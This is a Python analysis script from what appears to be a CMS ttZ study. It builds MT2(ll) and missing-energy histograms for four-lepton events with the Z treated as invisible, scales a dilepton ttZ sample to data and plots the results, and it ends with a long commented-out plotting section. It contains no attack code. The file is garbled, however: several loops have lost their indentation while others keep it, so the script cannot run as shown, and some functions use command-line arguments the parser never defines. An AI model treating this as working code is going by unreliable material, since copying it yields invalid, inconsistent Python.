argParser.add_argument('--logLevel', action='store', default='INFO', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], help="Log level for logging")
args = argParser.parse_args()
# PU reweighting on the fly
from TopEFT.Tools.puProfileCache import puProfile
from TopEFT.Tools.puReweighting import getReweightingFunction
from TopEFT.samples.helpers import fromHeppySample
#
# Logger
#
import TopEFT.Tools.logger as logger
import RootTools.core.logger as logger_rt
logger = logger.get_logger( args.logLevel, logFile = None)
logger_rt = logger_rt.get_logger(args.logLevel, logFile = None)
#
# Make samples, will be searched for in the postProcessing directory
#
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v17/trilep/"
from TopEFT.samples.cmgTuples_Data25ns_80X_07Aug17_postProcessed import *
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v18/trilep/"
from TopEFT.samples.cmgTuples_Summer16_mAODv2_postProcessed import *
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v19/dilep/"
dirs = {}
dirs['TTZ'] = ['TTZToLLNuNu_ext','TTZToQQ', 'TTZToLLNuNu_m1to10']#, 'TTZToQQ']
dirs['TTZToLLNuNu'] = ['TTZToLLNuNu_m1to10', 'TTZToLLNuNu_ext']
dirs['TTZToQQ'] = ['TTZToQQ']
directories = { key : [ os.path.join( data_directory, postProcessing_directory, dir) for dir in dirs[key]] for key in dirs.keys()}
# Define samples
TTZ = Sample.fromDirectory(name="TTZ", treeName="Events", isData=False, color=color.TTZ, texName="t#bar{t}Z,Z to inv.", directory=directories['TTZ'])
quadlepSelection = cutInterpreter.cutString('quadlep-lepSelQuad-njet1p-btag1p-onZ1-offZ2-min_mll12') # offZ2 in cutinterpreter doesn't do anything
quadlepSelection += "&&lep_pt[nonZ1_l1_index_4l]>40&&lep_pt[nonZ1_l2_index_4l]>20"
dilepSelection = cutInterpreter.cutString('lepSelDY-njet3p-btag1p')
dilepSelection += '&&nlep==2&&nLeptons_tight_4l==2&&(nElectrons_tight_4l==1&&nMuons_tight_4l==1)'
#dilepSelection += '&&nlep==2&&nLeptons_tight_4l==2&&((nElectrons_tight_4l==1&&nMuons_tight_4l==1)||(nElectrons_tight_4l==2&&abs(Z1_mass_4l-91.2)>10)||(nMuons_tight_4l==2&&abs(Z1_mass_4l-91.2)>10))'
dilepSelection += '&&genZ_pt>=0'
#dilepSelection += '&&(abs(genZ_daughter_flavor)==12||abs(genZ_daughter_flavor)==14||abs(genZ_daughter_flavor)==16)'
invisibleSelection = '(abs(genZ_daughter_flavor)==12||abs(genZ_daughter_flavor)==14||abs(genZ_daughter_flavor)==16)'
leptonicSelection = '(abs(genZ_daughter_flavor)==11||abs(genZ_daughter_flavor)==13)'
tauSelection = '(abs(genZ_daughter_flavor)==15)'
hadronicSelection = '(abs(genZ_daughter_flavor)<7)'
#
# Text on the plots
#
def drawObjects( plotData, dataMCScale, lumi_scale ):
    """Return the TLatex labels (CMS tag plus luminosity line) to draw on a plot.

    :param plotData: True when data is shown ('CMS Preliminary' + scale),
        False for simulation-only plots
    :param dataMCScale: data/MC normalization factor shown next to the lumi
    :param lumi_scale: integrated luminosity in fb^-1
    """
    latex = ROOT.TLatex()
    latex.SetNDC()
    latex.SetTextSize(0.04)
    latex.SetTextAlign(11) # align right
    header = (0.15, 0.95, 'CMS Preliminary' if plotData else 'CMS Simulation')
    if plotData:
        lumi_line = (0.45, 0.95, 'L=%3.1f fb{}^{-1} (13 TeV) Scale %3.2f'% ( lumi_scale, dataMCScale ) )
    else:
        lumi_line = (0.45, 0.95, 'L=%3.1f fb{}^{-1} (13 TeV)' % lumi_scale)
    return [latex.DrawLatex(*entry) for entry in (header, lumi_line)]
#scaling = { i+1:0 for i in range(len(signals)) }
def drawPlots(plots, mode, dataMCScale):
    """Draw every plot in *plots* for one lepton channel, once with a linear
    and once with a logarithmic y-axis, into
    <plot_directory>/analysisPlots/<args.plot_directory>/<mode>[_log]/<args.selection>.

    NOTE(review): relies on the module-level names ``args.plot_directory``,
    ``args.noData``, ``args.selection``, ``args.normalize``, ``scaling`` and
    ``lumi_scale``; in this file the argument parser only defines
    ``--logLevel`` and ``scaling`` appears only in the commented-out section
    below, so calling this as-is may raise -- confirm against script history.
    """
    for log in [False, True]:  # produce both linear- and log-scale versions
        plot_directory_ = os.path.join(plot_directory, 'analysisPlots', args.plot_directory, mode + ("_log" if log else ""), args.selection)
        for plot in plots:
            if not max(l[0].GetMaximum() for l in plot.histos): continue # Empty plot
            if not args.noData:
                # histos[1][0] is the data histogram in the stack layout.
                if mode == "all": plot.histos[1][0].legendText = "Data"
                if mode == "SF": plot.histos[1][0].legendText = "Data (SF)"
            # Only the combined channel gets vector/ROOT output formats.
            extensions_ = ["pdf", "png", "root"] if mode == 'all' else ['png']
            plotting.draw(plot,
                plot_directory = plot_directory_,
                extensions = extensions_,
                ratio = {'yRange':(0.1,1.9)} if not args.noData else None,
                logX = False, logY = log, sorting = True,
                yRange = (0.03, "auto") if log else (0.001, "auto"),
                scaling = scaling if args.normalize else {},
                legend = [ (0.15,0.9-0.03*sum(map(len, plot.histos)),0.9,0.9), 2],
                drawObjects = drawObjects( not args.noData, dataMCScale , lumi_scale ),
                copyIndexPHP = True,
            )
#
# Read variables and sequences
#
read_variables = ["weight/F",
"jet[pt/F,eta/F,phi/F,btagCSV/F,DFb/F,DFbb/F,id/I]", "njet/I","nJetSelected/I",
"lep[mediumMuonId/I,pt/F,eta/F,phi/F,pdgId/I,miniRelIso/F,relIso03/F,relIso04/F,sip3d/F,lostHits/I,convVeto/I,dxy/F,dz/F,hadronicOverEm/F,dEtaScTrkIn/F,dPhiScTrkIn/F,eInvMinusPInv/F,full5x5_sigmaIetaIeta/F,mvaTTV/F]", "nlep/I",
"met_pt/F", "met_phi/F", "metSig/F", "ht/F", "nBTag/I",
"Z1_l1_index_4l/I", "Z1_l2_index_4l/I", "nonZ1_l1_index_4l/I", "nonZ1_l2_index_4l/I", "Z2_l1_index_4l/I", "Z2_l2_index_4l/I",
"Z1_phi_4l/F","Z1_pt_4l/F", "Z1_mass_4l/F", "Z1_eta_4l/F","Z1_lldPhi_4l/F", "Z1_lldR_4l/F", "Z1_cosThetaStar_4l/F","Higgs_mass/F",
"Z2_phi_4l/F","Z2_pt_4l/F", "Z2_mass_4l/F", "Z2_eta_4l/F", "Z2_cosThetaStar_4l/F",
]
variables = map( TreeVariable.fromString, read_variables )
offZ2 = "&&abs(Z2_mass_4l-91.2)>20"
def getLeptonSelection( mode ):
    """Return the tight-lepton multiplicity cut string for a 4-lepton channel.

    Channels with a possible second same-flavour pair (4mu, 2mu2e, 4e) also
    get the module-level ``offZ2`` veto appended; 'all' only requires four
    tight leptons. Returns None for an unrecognized mode.
    """
    cuts = {
        "mumumumu": "nMuons_tight_4l==4&&nElectrons_tight_4l==0" + offZ2,
        "mumumue":  "nMuons_tight_4l==3&&nElectrons_tight_4l==1",
        "mumuee":   "nMuons_tight_4l==2&&nElectrons_tight_4l==2" + offZ2,
        "mueee":    "nMuons_tight_4l==1&&nElectrons_tight_4l==3",
        "eeee":     "nMuons_tight_4l==0&&nElectrons_tight_4l==4" + offZ2,
        "all":      "nMuons_tight_4l+nElectrons_tight_4l==4",
    }
    return cuts.get(mode)
modes = ["mumumumu","mumumue","mumuee","mueee","eeee"]
def getMT2ll_fromZ( event ):
    """Compute MT2(ll) for the two non-Z1 leptons, treating the Z1 candidate
    as invisible by folding its four-vector into the MET.

    Attaches results to the event: ``dl_mt2ll_Z`` (the MT2 value) and
    ``met_pt_Z`` (the Z-augmented MET pt).

    NOTE(review): mt2Calc is a shared module-level calculator, so the
    setLeptons -> setMet -> mt2ll call order must be preserved.
    """
    l1 = ROOT.TLorentzVector()
    l2 = ROOT.TLorentzVector()
    # Massless four-vectors for the two leptons not assigned to the Z1 pair.
    l1.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l1_index_4l], event.lep_eta[event.nonZ1_l1_index_4l], event.lep_phi[event.nonZ1_l1_index_4l], 0 )
    l2.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l2_index_4l], event.lep_eta[event.nonZ1_l2_index_4l], event.lep_phi[event.nonZ1_l2_index_4l], 0 )
    mt2Calc.setLeptons(l1.Pt(), l1.Eta(), l1.Phi(), l2.Pt(), l2.Eta(), l2.Phi())
    met = ROOT.TLorentzVector()
    met.SetPtEtaPhiM( event.met_pt, 0, event.met_phi, 0)
    Z = ROOT.TLorentzVector()
    Z.SetPtEtaPhiM( event.Z1_pt_4l, event.Z1_eta_4l, event.Z1_phi_4l, 0)
    # Emulate an invisible Z: add the Z1 candidate to the MET vector.
    newMet = met+Z
    mt2Calc.setMet(newMet.Pt(), newMet.Phi())
    event.dl_mt2ll_Z = mt2Calc.mt2ll()
    event.met_pt_Z = newMet.Pt()
def getMT2ll_tight_4l( event ):
    """Compute MT2(ll) for the two non-Z1 leptons using the unmodified MET
    and attach it to the event as ``dl_mt2ll_tight_4l``.

    NOTE(review): mt2Calc is a shared module-level calculator, so the
    setLeptons -> setMet -> mt2ll call order must be preserved.
    """
    l1 = ROOT.TLorentzVector()
    l2 = ROOT.TLorentzVector()
    # Massless four-vectors for the two leptons not assigned to the Z1 pair.
    l1.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l1_index_4l], event.lep_eta[event.nonZ1_l1_index_4l], event.lep_phi[event.nonZ1_l1_index_4l], 0 )
    l2.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l2_index_4l], event.lep_eta[event.nonZ1_l2_index_4l], event.lep_phi[event.nonZ1_l2_index_4l], 0 )
    mt2Calc.setLeptons(l1.Pt(), l1.Eta(), l1.Phi(), l2.Pt(), l2.Eta(), l2.Phi())
    met = ROOT.TLorentzVector()
    met.SetPtEtaPhiM( event.met_pt, 0, event.met_phi, 0)
    mt2Calc.setMet(met.Pt(), met.Phi())
    event.dl_mt2ll_tight_4l = mt2Calc.mt2ll()
logger.info("Getting a template histogram.")
binning = [0,50,100,150,200,340]
metBinning = [5,0,400]
mt2ll_hist = TTZ.get1DHistoFromDraw('dl_mt2ll', binning, selectionString=dilepSelection, weightString='weight', binningIsExplicit=True, addOverFlowBin='upper')
met_hist = TTZ.get1DHistoFromDraw('met_pt', metBinning, selectionString=dilepSelection, weightString='weight', binningIsExplicit=False, addOverFlowBin='upper')
hists = {}
met_hists = {}
quadlep_samples = [Run2016, rare, TTX, ZZ]
dilep_samples = [TTZ]
tr = triggerSelector(2016)
lumi_scale = 35.9
logger.info("Now working on 4l samples.")
for s in quadlep_samples:
logger.info("Sample: %s", s.name)
hists[s.name] = mt2ll_hist.Clone()
hists[s.name].Reset()
hists[s.name].legendText = s.texName
met_hists[s.name] = met_hist.Clone()
met_hists[s.name].Reset()
met_hists[s.name].legendText = s.texName
# selection for data or MC. Trigger and filters and stuff!
for mode in modes:
logger.info("Working on mode %s", mode)
if s.isData:
s.setSelectionString([getFilterCut(isData=True, year=2016), quadlepSelection, getLeptonSelection(mode)])
else:
s.setSelectionString([getFilterCut(isData=False, year=2016), quadlepSelection, tr.getSelection("MC"), getLeptonSelection(mode)])
reader = s.treeReader( variables = variables )
reader.start()
while reader.run():
r = reader.event
getMT2ll_fromZ(r)
if r.dl_mt2ll_Z > binning[-1]: r.dl_mt2ll_Z = binning[-1]-1
if r.met_pt_Z > metBinning[-1]: r.met_pt_Z = metBinning[-1]-1
weight = r.weight*lumi_scale if not s.isData else r.weight
hists[s.name].Fill(r.dl_mt2ll_Z, weight)
met_hists[s.name].Fill(r.met_pt_Z, weight)
del reader
logger.info("Now working on 2l samples.")
# Fill the mt2ll and MET histograms for the dilepton (2l) samples; the ttZ->2l
# events emulate the 4l analysis by using the gen-level invisible-Z selection.
for s in dilep_samples:
    logger.info("Sample: %s", s.name)
    hists[s.name] = mt2ll_hist.Clone()
    hists[s.name].Reset()
    hists[s.name].legendText = s.texName
    met_hists[s.name] = met_hist.Clone()
    met_hists[s.name].Reset()
    met_hists[s.name].legendText = s.texName
    # selection for data or MC. Trigger and filters and stuff!
    s.setSelectionString([getFilterCut(isData=False, year=2016), dilepSelection, invisibleSelection, tr.getSelection("MC")])
    reader = s.treeReader( variables = variables )
    reader.start()
    while reader.run():
        r = reader.event
        getMT2ll_tight_4l(r)
        # Clamp overflow into the last bin (these clones are filled manually,
        # so the template's addOverFlowBin option does not apply here).
        if r.dl_mt2ll_tight_4l > binning[-1]: r.dl_mt2ll_tight_4l = binning[-1]-1
        # BUG FIX: the original assigned the clamped value to the unrelated
        # attribute met_pt_Z (copy-paste from the 4l loop) while filling the
        # histogram with met_pt, so the clamp had no effect. Clamp the value
        # that is actually filled.
        met_value = r.met_pt
        if met_value > metBinning[-1]: met_value = metBinning[-1]-1
        hists[s.name].Fill(r.dl_mt2ll_tight_4l, r.weight*lumi_scale)
        met_hists[s.name].Fill(met_value, r.weight*lumi_scale)
    del reader
logger.info("Getting scaling...")
data_yield = hists['Run2016'].Integral()
other_yield = 0.
for s in quadlep_samples:
if not s.isData:
y = hists[s.name].Integral()
logger.info("Process %s has yield: %.2f", s, y)
other_yield += y
# scale TTZ
TTZ_scale = (data_yield-other_yield)/hists['TTZ'].Integral()
logger.info("Scale for dilep ttZ sample: %.2f", TTZ_scale)
hists['TTZ'].Scale(TTZ_scale)
met_hists['TTZ'].Scale(TTZ_scale)
########## now just plot I guess
for name in hists.keys():
#hists[name].legendText = name
if not name == 'Run2016':
hists[name].style = styles.fillStyle(getattr(color, name))
met_hists[name].style = styles.fillStyle(getattr(color, name))
else:
hists[name].style = styles.errorStyle(ROOT.kBlack)
met_hists[name].style = styles.errorStyle(ROOT.kBlack)
logger.info("Plotting.")
for log in [True, False]:
postFix = '_log' if log else ''
plots = [[hists['TTZ'], hists['ZZ'], hists['TTX'], hists['rare']], [hists['Run2016']]]
plotting.draw(
Plot.fromHisto("dl_mt2ll"+postFix,
plots,
texX = "M_{T2}(ll) (GeV)"
),
plot_directory = "/afs/hephy.at/user/d/dspitzbart/www/stopsDileptonLegacy/TTZstudies/ttZ_4l/",
logX = False, logY = log, sorting = False,
drawObjects = drawObjects(True, 1.0, lumi_scale),
#scaling = {0:1},
ratio = {'histos':[(1,0)], 'yRange':(0.1,1.9)},
legend = [ (0.55,0.7,0.9,0.9), 1],
copyIndexPHP = True
)
plots = [[met_hists['TTZ'], met_hists['ZZ'], met_hists['TTX'], met_hists['rare']], [met_hists['Run2016']]]
plotting.draw(
Plot.fromHisto("met_pt"+postFix,
plots,
texX = "E_{T}^{miss} (GeV)"
),
plot_directory = "/afs/hephy.at/user/d/dspitzbart/www/stopsDileptonLegacy/TTZstudies/ttZ_4l/",
logX = False, logY = log, sorting = False,
drawObjects = drawObjects(True, 1.0, lumi_scale),
#scaling = {0:1},
ratio = {'histos':[(1,0)], 'yRange':(0.1,1.9)},
legend = [ (0.55,0.7,0.9,0.9), 1],
copyIndexPHP = True
)
##
## Loop over channels
##
#yields = {}
#allPlots = {}
#allModes = ['mumumumu','mumumue','mumuee', 'mueee', 'eeee']
#for index, mode in enumerate(allModes):
# yields[mode] = {}
# logger.info("Working on mode %s", mode)
# if not args.noData:
# data_sample = Run2016 if args.year == 2016 else Run2017
# data_sample.texName = "data"
#
# data_sample.setSelectionString([getFilterCut(isData=True, year=args.year), getLeptonSelection(mode)])
# data_sample.name = "data"
# data_sample.read_variables = ["evt/I","run/I"]
# data_sample.style = styles.errorStyle(ROOT.kBlack)
# lumi_scale = data_sample.lumi/1000
#
# if args.noData: lumi_scale = 35.9 if args.year == 2016 else 41.0
# weight_ = lambda event, sample: event.weight
#
# if args.year == 2016:
# mc = [ TTZtoLLNuNu, TTX, rare, ZZ ]
# else:
# mc = [ TTZtoLLNuNu_17, TTX_17, rare_17, ZZ_17 ]
#
# for sample in mc: sample.style = styles.fillStyle(sample.color)
#
# for sample in mc + signals:
# sample.scale = lumi_scale
# sample.read_variables = ['reweightBTagCSVv2_SF/F', 'reweightBTagDeepCSV_SF/F', 'reweightPU36fb/F', 'reweightTrigger_tight_4l/F', 'reweightLeptonTrackingSF_tight_4l/F', 'nTrueInt/F', 'reweightPU36fb/F', 'reweightLeptonSF_tight_4l/F']#, 'reweightLeptonSF_tight_4l/F']
#
# if args.year == 2016:
# sample.weight = lambda event, sample: event.reweightBTagDeepCSV_SF*event.reweightTrigger_tight_4l*event.reweightLeptonTrackingSF_tight_4l*event.reweightPU36fb*event.reweightLeptonSF_tight_4l #*nTrueInt36fb_puRW(event.nTrueInt)
# else:
# sample.weight = lambda event, sample: event.reweightBTagDeepCSV_SF*event.reweightTrigger_tight_4l*event.reweightPU36fb*event.reweightLeptonSF_tight_4l #*event.reweightLeptonSF_tight_4l #*nTrueInt36fb_puRW(event.nTrueInt)
# tr = triggerSelector(args.year)
# sample.setSelectionString([getFilterCut(isData=False, year=args.year), getLeptonSelection(mode), tr.getSelection("MC")])
#
# if not args.noData:
# stack = Stack(mc, data_sample)
# else:
# stack = Stack(mc)
#
# stack.extend( [ [s] for s in signals ] )
#
# if args.small:
# for sample in stack.samples:
# sample.reduceFiles( to = 1 )
#
# # Use some defaults
# Plot.setDefaults(stack = stack, weight = weight_, selectionString = cutInterpreter.cutString(args.selection), addOverFlowBin='both')
#
# plots = []
#
# plots.append(Plot(
# name = 'yield', texX = 'yield', texY = 'Number of Events',
# attribute = lambda event, sample: 0.5 + index,
# binning=[5, 0, 5],
# ))
#
# plots.append(Plot(
# name = 'nVtxs', texX = 'vertex multiplicity', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nVert/I" ),
# binning=[50,0,50],
# ))
#
# plots.append(Plot(
# texX = 'E_{T}^{miss} (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "met_pt/F" ),
# binning=[400/20,0,400],
# ))
#
# plots.append(Plot(
# texX = 'H_{T} (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "ht/F" ),
# binning=[800/20,0,800],
# ))
#
# plots.append(Plot(
# texX = '#phi(E_{T}^{miss})', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "met_phi/F" ),
# binning=[10,-pi,pi],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[20,0,400],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_coarse', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 50 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[16,0,800],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_superCoarse', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[3,0,600],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_analysis', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 100 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[4,0,400],
# ))
#
# plots.append(Plot(
# name = "invM_3l",
# texX = 'M(3l) (GeV)', texY = 'Number of Events',
# attribute = lambda event, sample:event.threelmass,
# binning=[25,0,500],
# ))
#
# plots.append(Plot(
# texX = '#Delta#phi(ll)', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "Z1_lldPhi_4l/F" ),
# binning=[10,0,pi],
# ))
#
# # plots of lepton variables
#
# plots.append(Plot(
# name = "lZ1_pt",
# texX = 'p_{T}(l_{1,Z}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.Z1_l1_index_4l],
# binning=[30,0,300],
# ))
#
# plots.append(Plot(
# name = "lZ1_eta",
# texX = 'eta(l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.Z1_l1_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lZ1_phi",
# texX = '#phi(l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.Z1_l1_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lZ1_pdgId",
# texX = 'PDG ID (l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.Z1_l1_index_4l],
# binning=[30,-15,15],
# ))
#
# # lepton 2
# plots.append(Plot(
# name = "lZ2_pt",
# texX = 'p_{T}(l_{2,Z}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.Z1_l2_index_4l],
# binning=[20,0,200],
# ))
#
#
# plots.append(Plot(
# name = "lZ2_eta",
# texX = 'eta(l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.Z1_l2_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lZ2_phi",
# texX = '#phi(l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.Z1_l2_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lZ2_pdgId",
# texX = 'PDG ID (l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.Z1_l2_index_4l],
# binning=[30,-15,15],
# ))
#
# # lepton 3
# plots.append(Plot(
# name = 'lnonZ1_pt',
# texX = 'p_{T}(l_{1,extra}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.nonZ1_l1_index_4l],
# binning=[30,0,300],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_eta",
# texX = 'eta(l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.nonZ1_l1_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_phi",
# texX = '#phi(l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.nonZ1_l1_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_pdgId",
# texX = 'PDG ID (l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.nonZ1_l1_index_4l],
# binning=[30,-15,15],
# ))
#
# # other plots
#
#
# plots.append(Plot(
# texX = 'M(ll) (GeV)', texY = 'Number of Events / 2 GeV',
# attribute = TreeVariable.fromString( "Z1_mass_4l/F" ),
# binning=[20,70,110],
# ))
#
# plots.append(Plot(
# texX = 'M(ll) 2nd OS pair (GeV)', texY = 'Number of Events / 8 GeV',
# attribute = TreeVariable.fromString( "Z2_mass_4l/F" ),
# binning=[20,40,200],
# ))
#
# plots.append(Plot(
# texX = 'M(ZZ) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = TreeVariable.fromString( "Higgs_mass/F" ),
# binning=[22,80,300],
# ))
#
# plots.append(Plot(
# texX = 'M_{T2}(ll) Z estimated (GeV)', texY = 'Number of Events',
# name = "mt2ll_Z_estimated",
# attribute = lambda event, sample: event.dl_mt2ll_Z,
# binning=[4,0,320],
# ))
#
# plots.append(Plot(
# texX = 'N_{jets}', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nJetSelected/I" ), #nJetSelected
# binning=[8,-0.5,7.5],
# ))
#
# plots.append(Plot(
# texX = 'N_{b-tag}', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nBTag/I" ),
# binning=[4,-0.5,3.5],
# ))
#
# plots.append(Plot(
# texX = 'N_{l, loose}', texY = 'Number of Events',
# name = 'nLepLoose', attribute = lambda event, sample: event.nlep,
# binning=[5,2.5,7.5],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(leading l) (GeV)', texY = 'Number of Events / 20 GeV',
# name = 'lep1_pt', attribute = lambda event, sample: event.lep_pt[0],
# binning=[400/20,0,400],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(subleading l) (GeV)', texY = 'Number of Events / 10 GeV',
# name = 'lep2_pt', attribute = lambda event, sample: event.lep_pt[1],
# binning=[200/10,0,200],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(trailing l) (GeV)', texY = 'Number of Events / 10 GeV',
# name = 'lep3_pt', attribute = lambda event, sample: event.lep_pt[2],
# binning=[150/10,0,150],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(leading jet) (GeV)', texY = 'Number of Events / 30 GeV',
# name = 'jet1_pt', attribute = lambda event, sample: event.jet_pt[0],
# binning=[600/30,0,600],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(2nd leading jet) (GeV)', texY = 'Number of Events / 30 GeV',
# name = 'jet2_pt', attribute = lambda event, sample: event.jet_pt[1],
# binning=[600/30,0,600],
# ))
#
# plots.append(Plot(
# name = "LP", texX = 'L_{P}', texY = 'Number of Events / 0.1',
# attribute = lambda event, sample:event.Lp,
# binning=[20,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z1_cosThetaStar", texX = 'cos#theta(Z1,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z1_cosThetaStar_4l,
# binning=[10,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z1_cosThetaStar_coarse", texX = 'cos#theta(Z1,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z1_cosThetaStar_4l,
# binning=[5,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z2_cosThetaStar", texX = 'cos#theta(Z2,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z2_cosThetaStar_4l,
# binning=[10,-1,1],
# ))
#
# plotting.fill(plots, read_variables = read_variables, sequence = sequence)
#
# # Get normalization yields from yield histogram
# for plot in plots:
# if plot.name == "yield":
# for i, l in enumerate(plot.histos):
# for j, h in enumerate(l):
# yields[mode][plot.stack[i][j].name] = h.GetBinContent(h.FindBin(0.5+index))
# h.GetXaxis().SetBinLabel(1, "#mu#mu#mu#mu")
# h.GetXaxis().SetBinLabel(2, "#mu#mu#mue")
# h.GetXaxis().SetBinLabel(3, "#mu#muee")
# h.GetXaxis().SetBinLabel(4, "#mueee")
# h.GetXaxis().SetBinLabel(5, "eeee")
# if args.noData: yields[mode]["data"] = 0
#
# yields[mode]["MC"] = sum(yields[mode][s.name] for s in mc)
# dataMCScale = yields[mode]["data"]/yields[mode]["MC"] if yields[mode]["MC"] != 0 else float('nan')
#
# drawPlots(plots, mode, dataMCScale)
# allPlots[mode] = plots
#
## Add the different channels into SF and all
#for mode in ["comb1","comb2","comb3","all"]:
# yields[mode] = {}
# for y in yields[allModes[0]]:
# try: yields[mode][y] = sum(yields[c][y] for c in ['eeee','mueee','mumuee', 'mumumue', 'mumumumu'])
# except: yields[mode][y] = 0
# dataMCScale = yields[mode]["data"]/yields[mode]["MC"] if yields[mode]["MC"] != 0 else float('nan')
#
# for plot in allPlots['mumumumu']:
# if mode=="comb1":
# tmp = allPlots['mumumue']
# elif mode=="comb2":
# tmp = allPlots['mumuee']
# elif mode=="comb3":
# tmp = allPlots['mueee']
# else:
# tmp = allPlots['eeee']
# for plot2 in (p for p in tmp if p.name == plot.name):
# for i, j in enumerate(list(itertools.chain.from_iterable(plot.histos))):
# for k, l in enumerate(list(itertools.chain.from_iterable(plot2.histos))):
# if i==k:
# j.Add(l)
#
# if mode == "all": drawPlots(allPlots['mumumumu'], mode, dataMCScale)
#
#logger.info( "Done with prefix %s and selectionString %s", args.selection, cutInterpreter.cutString(args.selection) )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.